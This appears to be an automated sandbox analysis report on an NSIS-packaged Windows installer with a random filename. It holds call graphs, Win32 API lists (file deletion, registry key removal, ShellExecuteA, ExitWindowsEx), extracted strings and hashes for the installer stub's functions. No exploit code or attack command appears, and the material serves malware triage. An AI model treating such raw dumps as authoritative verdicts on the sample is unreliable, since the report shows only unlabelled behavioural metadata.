4031f8 WriteFile 4619->4622 4622->4621 4624 4097a6 4625 408cf0 4624->4625 4626 408a96 4624->4626 4626->4625 4627 408b69 GlobalAlloc 4626->4627 4628 408b4d GlobalFree 4626->4628 4629 408c55 GlobalAlloc 4626->4629 4630 408c45 GlobalFree 4626->4630 4627->4625 4627->4626 4628->4627 4629->4625 4629->4626 4630->4629 4631 402727 4632 401400 18 API calls 4631->4632 4633 402733 4632->4633 4634 408299 5 API calls 4633->4634 4635 402746 4634->4635 4636 40277c GlobalAlloc 4635->4636 4640 402a3c 4635->4640 4637 402799 4636->4637 4636->4640 4638 408299 5 API calls 4637->4638 4639 4027a5 4638->4639 4641 408299 5 API calls 4639->4641 4644 4027b8 4641->4644 4642 4027e5 GlobalFree 4642->4640 4644->4642 4648 407be3 wsprintfA 4644->4648 4646 40282d 4649 407be3 wsprintfA 4646->4649 4648->4646 4649->4642 4657 402ca8 4658 402101 4657->4658 4661 402127 4657->4661 4659 407e06 18 API calls 4658->4659 4660 402115 4659->4660 4662 407836 MessageBoxIndirectA 4660->4662 4662->4661 4663 401e29 4664 401400 18 API calls 4663->4664 4665 401e35 4664->4665 4670 407cde lstrlenA 4665->4670 4671 40342b 4672 401400 18 API calls 4671->4672 4673 403437 FindFirstFileA 4672->4673 4674 40346b 4673->4674 4678 403452 4673->4678 4679 407be3 wsprintfA 4674->4679 4676 40347d 4680 407cb6 lstrcpynA 4676->4680 4679->4676 4680->4678 4681 405bab 4682 405bc1 4681->4682 4683 405be9 4681->4683 4691 407805 GetDlgItemTextA 4682->4691 4684 405c39 4683->4684 4685 405bee SHGetPathFromIDListA 4683->4685 4687 405c04 4685->4687 4688 405bd1 SendMessageA 4685->4688 4690 403903 2 API calls 4687->4690 4688->4684 4690->4688 4691->4688 3900 40322e 3901 401456 18 API calls 3900->3901 3902 40323c 3901->3902 3903 4032d8 3902->3903 3904 40326b ReadFile 3902->3904 3905 4032bf 3902->3905 3908 4032ef 3902->3908 3904->3902 3904->3903 3909 407be3 wsprintfA 3905->3909 3907 4032fb SetFilePointer 3907->3903 3908->3903 3908->3907 3909->3903 4692 4020ae 4693 401400 18 API calls 4692->4693 4694 4020ba 4693->4694 4695 401456 18 API calls 4694->4695 4696 4020c9 wsprintfA 4695->4696 4697 40382f 4696->4697 4698 401db0 4699 401e0c 4698->4699 4700 401400 18 API calls 4699->4700 4701 401e11 4700->4701 4702 4085b8 63 API calls 4701->4702 4703 401e24 4702->4703 4704 402d34 4705 401400 18 API calls 4704->4705 4706 402d4a 4705->4706 4707 401400 18 API calls 4706->4707 4708 402d59 4707->4708 4709 401400 18 API calls 4708->4709 4710 402d6c GetPrivateProfileStringA 4709->4710 4711 402dab 4710->4711 4712 4057b5 4713 4057d0 4712->4713 4714 40597b 4712->4714 4717 404d65 18 API calls 4713->4717 4715 405987 4714->4715 4716 405a0b 4714->4716 4723 4059b0 GetDlgItem SendMessageA 4715->4723 4738 405a06 4715->4738 4718 405a14 GetDlgItem 4716->4718 4716->4738 4719 40583a 4717->4719 4720 405b02 4718->4720 4721 405a37 4718->4721 4724 404d65 18 API calls 4719->4724 4725 405b14 4720->4725 4720->4738 4721->4720 4728 405a65 SendMessageA 4721->4728 4722 404f0f 8 API calls 4729 405b9a 4722->4729 4749 404d44 EnableWindow 4723->4749 4727 405857 CheckDlgButton 4724->4727 4730 405b43 4725->4730 4731 405b1a SendMessageA 4725->4731 4746 404d44 EnableWindow 4727->4746 4737 405aa2 SetCursor ShellExecuteA 4728->4737 4730->4729 4734 405b4e SendMessageA 4730->4734 4731->4730 4732 405a00 4750 404d05 SendMessageA 4732->4750 4734->4729 4736 405880 GetDlgItem 4747 404c96 SendMessageA 4736->4747 4741 405afa SetCursor 4737->4741 4738->4722 4740 4058a1 SendMessageA 4742 4058e0 SendMessageA SendMessageA 4740->4742 4743 4058d4 GetSysColor 4740->4743 4741->4720 4748 407cde lstrlenA 4742->4748 4743->4742 4746->4736 4747->4740 4749->4732 4750->4738 4751 402db6 4752 402e00 4751->4752 4753 402dbf 4751->4753 4754 401400 18 API calls 4752->4754 4755 4015b0 19 API calls 4753->4755 4756 402e0c 4754->4756 4757 402dcb 4755->4757 4762 401482 RegOpenKeyExA 4756->4762 4758 401400 18 API calls 4757->4758 4761 402a3c 4757->4761 4760 402de2 RegDeleteValueA RegCloseKey 4758->4760 4760->4761 4768 401561 4762->4768 4769 4014ca 4762->4769 4763 401540 RegCloseKey 4764 408299 5 API calls 4763->4764 4766 40155c 4764->4766 4765 401511 RegCloseKey 4765->4768 4766->4768 4770 40158f RegDeleteKeyA 4766->4770 4767 401482 5 API calls 4767->4769 4768->4761 4769->4763 4769->4765 4769->4767 4770->4768 4771 401737 4772 406fcb 23 API calls 4771->4772 4773 401747 4772->4773 4774 401fb8 4775 401456 18 API calls 4774->4775 4776 401fc4 4775->4776 4777 401456 18 API calls 4776->4777 4778 401fd3 4777->4778 4779 402339 4780 401456 18 API calls 4779->4780 4781 402345 IsWindow 4780->4781 4782 402354 4781->4782 4783 401db9 4784 401400 18 API calls 4783->4784 4785 401dc5 4784->4785 4786 407836 MessageBoxIndirectA 4785->4786 4787 401dd8 4786->4787 4788 40183b 4789 401400 18 API calls 4788->4789 4790 401847 SetFileAttributesA 4789->4790 4791 401aff 4790->4791 4792 40573f 4793 405759 4792->4793 4799 405792 4792->4799 4794 404d65 18 API calls 4793->4794 4796 405770 4794->4796 4795 404f0f 8 API calls 4797 4057a8 4795->4797 4800 4077fb SetDlgItemTextA 4796->4800 4799->4795 4801 402cbf 4802 402cc5 4801->4802 4805 402cd1 4801->4805 4803 401400 18 API calls 4802->4803 4803->4805 4804 402ceb 4807 401400 18 API calls 4804->4807 4809 402d05 4804->4809 4805->4804 4806 401400 18 API calls 4805->4806 4806->4804 4807->4809 4808 401400 18 API calls 4810 402d14 WritePrivateProfileStringA 4808->4810 4809->4808 4811 402d2d 4810->4811

                                                                                                                            Executed Functions

                                                                                                                            Function 00404375 Relevance: 58.1, APIs: 21, Strings: 12, Instructions: 398comfilestringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 404375-404399 SetErrorMode GetVersion 1 4043b6 0->1 2 40439b-4043aa call 408299 0->2 4 4043bb-4043be 1->4 2->1 9 4043ac-4043b5 2->9 6 4043c0-4043c3 call 40820e 4->6 7 4043d9-404492 call 408299 * 2 InitCommonControls OleInitialize SHGetFileInfoA call 407cb6 GetCommandLineA call 407cb6 GetModuleHandleA 4->7 12 4043c8-4043d7 lstrlenA 6->12 20 404494-404499 7->20 21 40449e-4044b8 call 4078a4 CharNextA 7->21 9->1 12->4 20->21 24 4044be-4044c1 21->24 25 404560-40457e GetTempPathA call 4042bc 24->25 26 4044c7-4044cc 24->26 33 404580-40459f DeleteFileA call 403f03 25->33 34 4045a7-4045db GetWindowsDirectoryA call 407ce8 call 4042bc 25->34 27 4044d1-4044d9 26->27 28 4044ce-4044cf 26->28 30 4044e1-4044e4 27->30 31 4044db-4044dc 27->31 28->26 35 404543-40455b call 4078a4 30->35 36 4044e6-4044ed 30->36 31->30 47 4045a5-4045ee 33->47 48 404817-404824 call 404316 OleUninitialize 33->48 34->33 58 4045dd-4045e2 34->58 35->24 38 404500-404507 36->38 39 4044ef-4044fd 36->39 43 404509-404517 38->43 44 40451a-404521 38->44 39->38 43->44 49 404541 44->49 50 404523-40453f call 407cb6 44->50 59 404802-40480c call 4060fd 47->59 60 4045f4-404609 call 4078a4 47->60 62 404844-40484b 48->62 63 404826-40483f call 407836 48->63 49->35 50->25 64 404815 58->64 66 404811-404813 59->66 74 40460a-40460f 60->74 68 404851-40488e call 408299 * 3 62->68 69 40499e-4049a9 62->69 71 4049ac ExitProcess 63->71 64->48 66->48 94 404933-404942 call 408299 68->94 95 404894-40489b 68->95 69->71 76 404611-404617 74->76 77 404662-404681 call 4082eb call 407ce8 74->77 79 404619-40461a 76->79 80 40461c-40462d call 40815b 76->80 92 404683-404698 call 407ce8 77->92 93 404699-4046c8 call 407ce8 lstrcmpiA 77->93 79->74 89 404639-40465d call 407cb6 * 2 80->89 90 40462f-404634 80->90 89->59 90->64 92->93 93->90 108 4046ce-4046d7 93->108 106 404961-40498f 94->106 107 404944-40495d ExitWindowsEx 94->107 95->94 99 4048a1-4048c3 GetCurrentProcess 95->99 99->94 115 4048c5-404930 99->115 106->107 111 404991-40499d call 403903 106->111 107->111 112 40495f 107->112 113 4046e0 call 40774b 108->113 114 4046d9-4046de call 4076b0 108->114 111->69 112->69 123 4046e5-4046fb SetCurrentDirectoryA 113->123 114->123 115->94 124 404713-404735 call 407cb6 123->124 125 4046fd-404712 call 407cb6 123->125 131 40473e-404767 call 407e06 DeleteFileA 124->131 125->124 134 404769-40478b CopyFileA 131->134 135 4047dd-4047e4 131->135 134->135 137 40478d-4047cf call 408311 call 407e06 call 407779 134->137 135->131 136 4047ea-404800 call 408311 135->136 136->64 137->135 146 4047d1-4047dc CloseHandle 137->146 146->135
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32 ref: 00404388
                                                                                                                            • GetVersion.KERNEL32 ref: 0040438F
                                                                                                                            • lstrlenA.KERNEL32 ref: 004043CC
                                                                                                                            • InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
                                                                                                                            • OleInitialize.OLE32 ref: 00404405
                                                                                                                            • SHGetFileInfoA.SHELL32 ref: 0040443A
                                                                                                                            • GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404478
                                                                                                                            • CharNextA.USER32 ref: 004044B1
                                                                                                                              • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                              • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                            • GetTempPathA.KERNEL32(00000001,00000001), ref: 0040456F
                                                                                                                            • DeleteFileA.KERNEL32 ref: 0040458D
                                                                                                                            • GetWindowsDirectoryA.KERNEL32 ref: 004045B6
                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 0040481C
                                                                                                                            • ExitProcess.KERNEL32 ref: 004049AC
                                                                                                                              • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00000000,?,00000000), ref: 004048A1
                                                                                                                            • ExitWindowsEx.USER32 ref: 00404953
                                                                                                                              • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                              • Part of subcall function 004060FD: lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                              • Part of subcall function 004060FD: GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CharExitHandleModuleNextProcessWindows$AddressAttributesCommandCommonControlsCurrentDeleteDirectoryErrorInfoInitInitializeLineModePathProcTempUninitializeVersionlstrcmpilstrcpynlstrlen
                                                                                                                            • String ID: /D=$ _?=$"C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe" $%$($62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$8_o$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Software Setup$UXTHEME
                                                                                                                            • API String ID: 3796326152-2673972989
                                                                                                                            • Opcode ID: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                            • Instruction ID: 1612ab991b91f7509b6110098b19e500dbf275244ae378e5724325f5e1753ea3
                                                                                                                            • Opcode Fuzzy Hash: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                            • Instruction Fuzzy Hash: 34F143F0908300AFD720AF65D94876BBBE4EF85704F41887EE5C8A7291D77C58458B6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004085B8 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 192filestringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 298 4085b8-4085d4 call 40815b 301 4085f3-408601 298->301 302 4085d6-4085ee DeleteFileA 298->302 303 408603-408605 301->303 304 408615-40862e call 407cb6 301->304 305 40883e-408845 302->305 306 408824-40882a 303->306 307 40860b-40860f 303->307 312 408630-408646 call 407ce8 304->312 313 408648-408650 call 4078ce 304->313 306->305 307->304 309 4087cd-4087d8 call 408123 307->309 309->305 317 4087da-4087f8 call 407cf2 call 407a46 RemoveDirectoryA 309->317 321 408651-408654 312->321 313->321 334 4087fa-4087fe 317->334 335 40882c-408837 call 406fcb 317->335 323 408656-40865d 321->323 324 40865f-408670 call 407ce8 321->324 323->324 326 408671-4086a1 lstrlenA FindFirstFileA 323->326 324->326 328 4087b6-4087bd 326->328 329 4086a7-4086c2 call 4078a4 326->329 328->305 332 4087bf-4087cb 328->332 339 4086d2-4086d7 329->339 340 4086c4-4086d0 329->340 332->306 332->309 334->306 338 408800-408822 call 406fcb call 408311 334->338 341 40883c-40883d 335->341 338->341 339->340 344 4086d9 339->344 343 4086dc-4086df 340->343 341->305 346 4086e1-4086e6 343->346 347 4086fb-408716 call 407cb6 343->347 344->343 350 4086ec-4086ef 346->350 351 40878f-4087a6 FindNextFileA 346->351 356 408734-408749 call 407a46 DeleteFileA 347->356 357 408718-408721 347->357 350->347 354 4086f1-4086f5 350->354 351->329 353 4087ac-4087b5 FindClose 351->353 353->328 354->347 354->351 363 40874b-40874f 356->363 364 40877d-408788 call 406fcb 356->364 357->351 359 408723-408732 call 4085b8 357->359 365 40878d-40878e 359->365 366 408751-408773 call 406fcb call 408311 363->366 367 408775-40877b 363->367 364->365 365->351 366->365 367->351
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNEL32 ref: 004085D9
                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
                                                                                                                            • FindFirstFileA.KERNEL32 ref: 00408694
                                                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextlstrlen
                                                                                                                            • String ID: ?$C:\Users\user\AppData\Local\Temp\nsiC1CE.tmp\*.*
                                                                                                                            • API String ID: 3200608346-608771194
                                                                                                                            • Opcode ID: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
                                                                                                                            • Instruction ID: 15a94c35718d9934db7cd19974bec7e4185b96846047f3cacb9e12796964f464
                                                                                                                            • Opcode Fuzzy Hash: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
                                                                                                                            • Instruction Fuzzy Hash: 5E7175B0908344AED720AF25CE4576EBBF8AF45714F45887EE8C5A7381CB3D8844CB5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408123 Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
                                                                                                                            • Instruction ID: 11fd5c66118aeed7f08c7c2f326ea88146cd1b5fc0ef80ef14f89fbd5f6a2284
                                                                                                                            • Opcode Fuzzy Hash: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
                                                                                                                            • Instruction Fuzzy Hash: 20E0ECB5704204AFD700BFB89C4841B7AE9AB94714B84C929B9A5CB390D634C85287AA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004060FD Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 253registrystringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 147 4060fd-40611a call 408299 150 406136-406176 call 407b3a 147->150 151 40611c-406131 call 407be3 147->151 156 4061a7-4061b6 call 407ce8 150->156 157 406178-4061a4 call 407b3a 150->157 161 4061bb-4061e8 call 404ae0 call 40815b 151->161 156->161 157->156 167 4062be-4062cd call 40815b 161->167 168 4061ee-4061f3 161->168 174 4062e7-406329 LoadImageA 167->174 175 4062cf-4062e6 call 407e06 167->175 168->167 169 4061f9-406232 call 407b3a 168->169 169->167 176 406238-40623f 169->176 178 406405-40640c call 403903 174->178 179 40632f-40636b RegisterClassA 174->179 175->174 181 406241-40625c call 4078a4 176->181 182 40625f-40626e call 407cde 176->182 186 406411-406416 178->186 184 406374-406400 SystemParametersInfoA CreateWindowExA 179->184 185 40636d-40636f 179->185 181->182 195 406270-406285 lstrcmpiA 182->195 196 4062a3-4062bd call 407cf2 call 407cb6 182->196 184->178 189 40654e-406556 185->189 190 40653a-40653f 186->190 191 40641c-406428 call 404ae0 186->191 190->189 201 406513-406522 call 404c0d 191->201 202 40642e-406455 ShowWindow call 40820e 191->202 195->196 199 406287-406294 GetFileAttributesA 195->199 196->167 203 406296-406298 199->203 204 40629a-4062a2 call 4078ce 199->204 213 406541-406548 call 403903 201->213 214 406524-40652b 201->214 215 406464-406488 GetClassInfoA 202->215 216 406457-406463 call 40820e 202->216 203->196 203->204 204->196 224 40654d 213->224 214->190 217 40652d-406539 call 403903 214->217 220 40648a-4064bd GetClassInfoA RegisterClassA 215->220 221 4064be-406511 DialogBoxParamA call 403903 call 4049b4 215->221 216->215 217->190 220->221 221->224 224->189
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                              • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                            • lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                            • GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                              • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                            • LoadImageA.USER32(?,?,00000000,00000000), ref: 00406317
                                                                                                                            • RegisterClassA.USER32 ref: 00406361
                                                                                                                            • SystemParametersInfoA.USER32 ref: 00406392
                                                                                                                            • CreateWindowExA.USER32 ref: 004063F7
                                                                                                                            • ShowWindow.USER32 ref: 0040643E
                                                                                                                            • GetClassInfoA.USER32(?,00000000), ref: 00406481
                                                                                                                            • GetClassInfoA.USER32 ref: 004064A1
                                                                                                                            • RegisterClassA.USER32 ref: 004064B7
                                                                                                                            • DialogBoxParamA.USER32 ref: 004064ED
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcmpiwsprintf
                                                                                                                            • String ID: 8_o$_Nb$g
                                                                                                                            • API String ID: 3995538257-3066073381
                                                                                                                            • Opcode ID: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                            • Instruction ID: 933614cd0025173359140365b9e7a590c615df7829bf1f80af9a09b402b61920
                                                                                                                            • Opcode Fuzzy Hash: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                            • Instruction Fuzzy Hash: 75B10AB05083019FE710AF65D94872BBBE4EF44308F41892EE4D597391D7BC9895CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403F03 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 216memoryfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 230 403f03-403f6d GetTickCount GetModuleFileNameA call 407a78 233 4042b1-4042b8 230->233 234 403f73-403fc4 call 407cb6 call 4078ce call 407cb6 GetFileSize 230->234 241 403fce-403fd0 234->241 242 4040c3-4040d6 call 4039fe 241->242 243 403fd6-403ffb call 403ae9 241->243 250 4040d8 242->250 251 40412d-40413a 242->251 247 404000-404004 243->247 248 404006-404012 call 4039fe 247->248 249 404017-40401e 247->249 253 404168-40416d 248->253 254 404024-404050 call 407a23 249->254 255 4040ed-4040f1 249->255 250->253 256 404172-4041f0 GlobalAlloc call 408904 call 407ad4 CreateFileA 251->256 257 40413c-404155 call 403b31 call 403ae9 251->257 253->233 260 4040ff-404105 254->260 271 404056-404060 254->271 259 4040f3-4040fa call 4039fe 255->259 255->260 256->233 279 4041f6-40424b call 403b31 call 403d52 256->279 274 40415a-40415e 257->274 259->260 267 404120-404128 260->267 268 404107-40411e call 408898 260->268 267->241 268->267 271->260 276 404066-404070 271->276 274->253 278 404160-404166 274->278 276->260 280 404076-404080 276->280 278->253 278->256 287 404250-404259 279->287 280->260 282 404082-40408c 280->282 282->260 284 40408e-4040b1 282->284 284->253 286 4040b7-4040bb 284->286 288 4040dd-4040eb 286->288 289 4040bd-4040c1 286->289 287->253 290 40425f-404273 287->290 288->260 289->242 289->288 291 404275 290->291 292 40427b 290->292 291->292 293 404280-404281 292->293 294 404283-404287 293->294 295 404289-4042ae call 407a23 293->295 294->293 295->233
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 00403F0F
                                                                                                                            • GetModuleFileNameA.KERNEL32 ref: 00403F36
                                                                                                                              • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                              • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                              • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                              • Part of subcall function 004078CE: lstrlenA.KERNEL32 ref: 004078DB
                                                                                                                              • Part of subcall function 004078CE: CharPrevA.USER32 ref: 004078F0
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,75923160), ref: 00403FB5
                                                                                                                              • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                            • GlobalAlloc.KERNEL32 ref: 00404183
                                                                                                                            • CreateFileA.KERNEL32(00000000,00000000), ref: 004041DC
                                                                                                                              • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                            Strings
                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00404168
                                                                                                                            • d`o, xrefs: 004042A0
                                                                                                                            • @, xrefs: 00404294
                                                                                                                            • Null, xrefs: 00404082
                                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004041EB
                                                                                                                            • soft, xrefs: 00404076
                                                                                                                            • Inst, xrefs: 00404066
                                                                                                                            • 8_o, xrefs: 00404266
                                                                                                                            • Error launching installer, xrefs: 00403F68
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
